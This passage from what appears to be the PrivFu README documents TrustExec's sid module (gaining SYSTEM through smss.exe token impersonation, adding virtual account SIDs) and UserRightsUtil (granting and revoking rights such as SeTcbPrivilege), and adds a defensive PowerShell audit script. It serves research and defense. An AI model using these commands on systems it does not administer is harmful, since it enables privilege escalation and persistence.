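        Marshal.FreeHGlobal(buffer);
        return table;
    }

    // TOKEN_GROUPS: DWORD GroupCount, padded to pointer alignment, then SID_AND_ATTRIBUTES[]
    public static bool HasGroup(IntPtr token, string sidString)
    {
        IntPtr buffer = QueryToken(token, TokenGroups);
        int count = Marshal.ReadInt32(buffer), size = Marshal.SizeOf(typeof(SID_AND_ATTRIBUTES));
        bool found = false;
        for (int i = 0; i < count && !found; i++)
        {
            var entry = (SID_AND_ATTRIBUTES)Marshal.PtrToStructure(buffer + IntPtr.Size + i * size, typeof(SID_AND_ATTRIBUTES));
            found = new SecurityIdentifier(entry.Sid).Value == sidString;
        }
        Marshal.FreeHGlobal(buffer);
        return found;
    }

    // Usage: TokenAudit.exe [PID]; defaults to the current process
    static void Main(string[] args)
    {
        int pid = args.Length > 0 ? int.Parse(args[0]) : System.Diagnostics.Process.GetCurrentProcess().Id;
        IntPtr process = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, false, pid), token;
        if (process == IntPtr.Zero || !OpenProcessToken(process, TOKEN_QUERY, out token))
            throw new Win32Exception(Marshal.GetLastWin32Error());
        foreach (var kv in Privileges(token)) Console.WriteLine("{0,-42} {1}", kv.Key, kv.Value);
        if (HasGroup(token, TrustedInstallerSid))
            Console.WriteLine("[!] PID {0} carries the TrustedInstaller group SID in its token", pid);
        CloseHandle(token); CloseHandle(process);
    }
}
```

Opening another user's process needs SeDebugPrivilege enabled, as TokenDump does before it dumps a handle.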

sid Module

This module manages the virtual accounts created by this tool:

C:\dev>TrustExec.exe -m sid -h

TrustExec - Help for "sid" command.

Usage: TrustExec.exe -m sid [Options]

        -h, --help     : Displays this help message.
        -a, --add      : Flag to add virtual account's SID.
        -r, --remove   : Flag to remove virtual account's SID.
        -d, --domain   : Specifies domain name to add or remove. Default value is null.
        -u, --username : Specifies username to add or remove. Default value is null.
        -i, --id       : Specifies RID for virtual domain to add. Default value is "110".
        -s, --sid      : Specifies SID to lookup.
        -l, --lookup   : Flag to lookup SID or account name in local system.

To look up a SID, set the -l flag. If you want to look up the domain or username from a SID, specify the SID with the -s option as follows:

C:\dev>TrustExec.exe -m sid -l -s S-1-5-18

[*] Result:
    |-> Account Name : nt authority\system
    |-> SID          : S-1-5-18
    |-> Account Type : SidTypeWellKnownGroup

If you want to look up a SID from a domain name, specify the domain name with the -d option as follows:

C:\dev>TrustExec.exe -m sid -l -d contoso

[*] Result:
    |-> Account Name : contoso
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818
    |-> Account Type : SidTypeDomain

If you want to look up a SID from a domain name and username, specify the domain name with the -d option and the username with the -u option as follows:

C:\dev>TrustExec.exe -m sid -l -d contoso -u david

[*] Result:
    |-> Account Name : contoso\david
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-1104
    |-> Account Type : SidTypeUser

To remove a virtual account, set the -r flag. The domain name to remove is specified with the -d option and the username with the -u option:

C:\dev>TrustExec.exe -m sid -r -d defaultdomain -u defaultuser

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 2568
[+] Impersonation is successful.
[>] Trying to remove SID.
    |-> Domain   : defaultdomain
    |-> Username : defaultuser
[*] SID : S-1-5-110-110.
[+] Requested SID is removed successfully.


C:\dev>TrustExec.exe -m sid -r -d defaultdomain

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 4696
[+] Impersonation is successful.
[>] Trying to remove SID.
    |-> Domain   : defaultdomain
[*] SID : S-1-5-110.
[+] Requested SID is removed successfully.

WARNING: Deleted SIDs may appear to remain until the OS is rebooted.

If you want to add a domain or user SID, set the -a flag as follows:

C:\dev>TrustExec.exe -m sid -a -d virtualworld -u virtualadmin -i 97

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 3628
[+] Impersonation is successful.
[>] Trying to add virtual domain and user.
    |-> Domain   : virtualworld (SID : S-1-5-97)
    |-> Username : virtualadmin (SID : S-1-5-97-110)
[+] Added virtual domain and user.

C:\dev>TrustExec.exe -m sid -l -s S-1-5-97

[*] Result : virtualworld (SID : S-1-5-97)


C:\dev>TrustExec.exe -m sid -l -s S-1-5-97-110

[*] Result : virtualworld\virtualadmin (SID : S-1-5-97-110)

UserRightsUtil

Back to Top

Project

This tool manages user rights without secpol.msc. Commands other than lookup require administrator privileges:

C:\dev>UserRightsUtil.exe

UserRightsUtil - User rights management utility.

Usage: UserRightsUtil.exe [Options]

        -h, --help   : Displays this help message.
        -m, --module : Specifies module name.

Available Modules:

        + enum   - Enumerate user rights for specific account.
        + find   - Find accounts have a specific user right.
        + lookup - Lookup account's SID.
        + manage - Grant or revoke user rights.

[*] To see help for each modules, specify "-m <Module> -h" as arguments.

[!] -m option is required.

enum Module

To enumerate the user rights of a specific account, use the enum command with the -u and -d options or the -s option as follows:

C:\dev>UserRightsUtil.exe -m enum -d contoso -u jeff

[>] Trying to enumerate user rights.
    |-> Username : CONTOSO\jeff
    |-> SID      : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
    |-> SeChangeNotifyPrivilege
    |-> SeIncreaseWorkingSetPrivilege
    |-> SeShutdownPrivilege
    |-> SeUndockPrivilege
    |-> SeTimeZonePrivilege
    |-> SeInteractiveLogonRight
    |-> SeNetworkLogonRight
[*] Done.


C:\dev>UserRightsUtil.exe -m enum -s S-1-5-21-3654360273-254804765-2004310818-1105

[>] Trying to enumerate user rights.
    |-> Username : CONTOSO\jeff
    |-> SID      : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
    |-> SeChangeNotifyPrivilege
    |-> SeIncreaseWorkingSetPrivilege
    |-> SeShutdownPrivilege
    |-> SeUndockPrivilege
    |-> SeTimeZonePrivilege
    |-> SeInteractiveLogonRight
    |-> SeNetworkLogonRight
[*] Done.

If you don't specify a domain name with the -d option, the local computer name is used as the domain name:

C:\dev>hostname
CL01

C:\dev>UserRightsUtil.exe -m enum -u guest

[>] Trying to enumerate user rights.
    |-> Username : CL01\Guest
    |-> SID      : S-1-5-21-2659926013-4203293582-4033841475-501
[+] Got 3 user right(s).
    |-> SeInteractiveLogonRight
    |-> SeDenyInteractiveLogonRight
    |-> SeDenyNetworkLogonRight
[*] Done.

find Module

This command finds users who have a specific right. For example, if you want to find users who have SeDebugPrivilege, execute as follows:

C:\dev>UserRightsUtil.exe -m find -r debug

[>] Trying to find users with SeDebugPrivilege.
[+] Found 1 user(s).
    |-> BUILTIN\Administrators (SID : S-1-5-32-544, Type : SidTypeAlias)
[*] Done.

To list the available values for the -r option, use the -l option:

C:\dev>UserRightsUtil.exe -m find -l

Available values for --right option:
        + TrustedCredManAccess           : Specfies SeTrustedCredManAccessPrivilege.
        + NetworkLogon                   : Specfies SeNetworkLogonRight.
        + Tcb                            : Specfies SeTcbPrivilege.
        + MachineAccount                 : Specfies SeMachineAccountPrivilege.
        + IncreaseQuota                  : Specfies SeIncreaseQuotaPrivilege.
        + InteractiveLogon               : Specfies SeInteractiveLogonRight.
        + RemoteInteractiveLogon         : Specfies SeRemoteInteractiveLogonRight.
        + Backup                         : Specfies SeBackupPrivilege.

--snip--

lookup Module

This command looks up an account's SID (or the account name for a given SID) as follows:

C:\dev>UserRightsUtil.exe -m lookup -d contoso -u david

[*] Result:
    |-> Account Name : CONTOSO\david
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-1104
    |-> Account Type : SidTypeUser


C:\dev>UserRightsUtil.exe -m lookup -s S-1-5-21-3654360273-254804765-2004310818-500

[*] Result:
    |-> Account Name : CONTOSO\Administrator
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-500
    |-> Account Type : SidTypeUser


C:\dev>UserRightsUtil.exe -m lookup -d contoso -u "domain admins"

[*] Result:
    |-> Account Name : CONTOSO\Domain Admins
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-512
    |-> Account Type : SidTypeGroup

If you don't specify a domain name with the -d option, the local computer name is used as the domain name:

C:\dev>hostname
CL01

C:\dev>UserRightsUtil.exe -m lookup -u admin

[*] Result:
    |-> Account Name : CL01\admin
    |-> SID          : S-1-5-21-2659926013-4203293582-4033841475-500
    |-> Account Type : SidTypeUser

manage Module

This command grants or revokes user rights for a specific user account. To grant a user right, specify it as the value for the -g option:

C:\dev>UserRightsUtil.exe -m find -r tcb

[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.


C:\dev>UserRightsUtil.exe -m manage -g tcb -d contoso -u administrator

[>] Target account information:
    |-> Username : CONTOSO\Administrator
    |-> SID      : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to grant SeTcbPrivilege.
[+] SeTcbPrivilege is granted successfully.

C:\dev>UserRightsUtil.exe -m find -r tcb

[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
    |-> CONTOSO\Administrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.

To revoke a user right, specify it as the value for the -r option:

C:\dev>UserRightsUtil.exe -m find -r tcb

[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
    |-> CONTOSO\Administrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.


C:\dev>UserRightsUtil.exe -m manage -r tcb -d contoso -u administrator

[>] Target account information:
    |-> Username : CONTOSO\Administrator
    |-> SID      : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to revoke SeTcbPrivilege
[+] SeTcbPrivilege is revoked successfully.

C:\dev>UserRightsUtil.exe -m find -r tcb

[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.

To list the available values for the -g or -r option, use the -l option:

C:\dev>UserRightsUtil.exe -m manage -l

Available values for --grant and --revoke options:
        + TrustedCredManAccess           : Specfies SeTrustedCredManAccessPrivilege.
        + NetworkLogon                   : Specfies SeNetworkLogonRight.
        + Tcb                            : Specfies SeTcbPrivilege.
        + MachineAccount                 : Specfies SeMachineAccountPrivilege.
        + IncreaseQuota                  : Specfies SeIncreaseQuotaPrivilege.
        + InteractiveLogon               : Specfies SeInteractiveLogonRight.
        + RemoteInteractiveLogon         : Specfies SeRemoteInteractiveLogonRight.
        + Backup                         : Specfies SeBackupPrivilege.

--snip--
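The enum, find, lookup and manage modules above all operate on the same data: the user rights assignments held by the Local Security Authority. Because a right such as SeTcbPrivilege granted by manage is effectively a persistent path to SYSTEM, a defender wants an independent way to confirm what find reports and to notice when an assignment changes. The following PowerShell script is an added example, not part of PrivFu or its README: it exports the current assignments with the built-in secedit tool, resolves each holder's SID to an account name (the same translation the lookup module performs), lists who holds a set of high-risk rights, and diffs the result against a saved baseline so that a newly granted right stands out. The list of high-risk rights and the baseline path are assumptions chosen for this example; it must be run from an elevated session, since secedit /export requires administrator privileges.

```powershell
# Added example (not PrivFu code): audit user rights assignments and flag
# drift against a baseline. Run from an elevated PowerShell session.

# Assumption: the rights a defender most wants to watch on this host.
$HighRiskRights = @(
    'SeTcbPrivilege',                # act as part of the operating system
    'SeDebugPrivilege',
    'SeCreateTokenPrivilege',
    'SeAssignPrimaryTokenPrivilege',
    'SeImpersonatePrivilege',
    'SeRestorePrivilege',
    'SeBackupPrivilege',
    'SeTakeOwnershipPrivilege',
    'SeLoadDriverPrivilege'
)

function ConvertFrom-UserRightsInf {
    # Parse the [Privilege Rights] section of a secedit INF export into a
    # hashtable: right name -> array of raw values ("*S-1-5-32-544", ...).
    param([string[]]$Lines)
    $rights = @{}
    $inSection = $false
    foreach ($line in $Lines) {
        if ($line -match '^\[(.+)\]$') {
            $inSection = ($Matches[1] -eq 'Privilege Rights')
            continue
        }
        if (-not $inSection -or $line -notmatch '^\s*(Se\w+)\s*=\s*(.*)$') { continue }
        $right  = $Matches[1]
        $values = $Matches[2] -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ }
        $rights[$right] = @($values)
    }
    return $rights
}

function Export-UserRights {
    # Ask secedit for the USER_RIGHTS area only, parse it, and clean up the INF.
    $inf = Join-Path $env:TEMP ("user-rights_{0}.inf" -f [guid]::NewGuid())
    try {
        & secedit.exe /export /cfg $inf /areas USER_RIGHTS | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "secedit failed with exit code $LASTEXITCODE" }
        return ConvertFrom-UserRightsInf (Get-Content -Path $inf)
    } finally {
        Remove-Item -Path $inf -ErrorAction SilentlyContinue
    }
}

function Resolve-RightHolder {
    # secedit writes SIDs with a leading '*'; translate them to DOMAIN\name.
    # An unresolvable SID (deleted account, unreachable domain) is returned as-is,
    # which is itself worth a look during an audit.
    param([string]$Value)
    if ($Value -notlike '*S-1-*') { return $Value }
    $sid = New-Object System.Security.Principal.SecurityIdentifier ($Value.TrimStart('*'))
    try   { return $sid.Translate([System.Security.Principal.NTAccount]).Value }
    catch { return $sid.Value }
}

function Get-HighRiskRightHolders {
    # One row per (right, holder) pair for every watched right that is assigned.
    param([hashtable]$Rights, [string[]]$Watch = $HighRiskRights)
    foreach ($right in $Watch) {
        if (-not $Rights.ContainsKey($right)) { continue }
        foreach ($value in $Rights[$right]) {
            [pscustomobject]@{
                Right  = $right
                Holder = (Resolve-RightHolder $value)
                Raw    = $value
            }
        }
    }
}

# Usage: show current holders, then compare with a baseline captured earlier.
$holders = Get-HighRiskRightHolders -Rights (Export-UserRights)
$holders | Format-Table -AutoSize

$baselinePath = 'C:\baseline\user-rights.json'   # assumed path
# Create the baseline once on a known-good host with:
#   $holders | ConvertTo-Json | Set-Content -Path $baselinePath
if (Test-Path -Path $baselinePath) {
    $baseline = Get-Content -Path $baselinePath | ConvertFrom-Json
    Compare-Object -ReferenceObject $baseline -DifferenceObject $holders -Property Right, Raw |
        ForEach-Object {
            $state = if ($_.SideIndicator -eq '=>') { 'ADDED' } else { 'REMOVED' }
            Write-Warning ("{0}: {1} -> {2} ({3})" -f $state, $_.Right, (Resolve-RightHolder $_.Raw), $_.Raw)
        }
}
```

Compared with reading the output of find by hand, the diff step is what turns this into a check: after the manage example above grants SeTcbPrivilege to CONTOSO\Administrator, a run against a baseline taken before the grant reports that pair as ADDED, and it disappears again after the revoke. Comparing on the raw SID rather than the resolved name keeps the diff stable when name resolution fails on a disconnected host.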

Reference

Back to Top

Acknowledgments

Back to Top

Thanks for your advice about WinDbg extension programming:

Thanks for your notable research:

Thanks for your sample kernel driver release: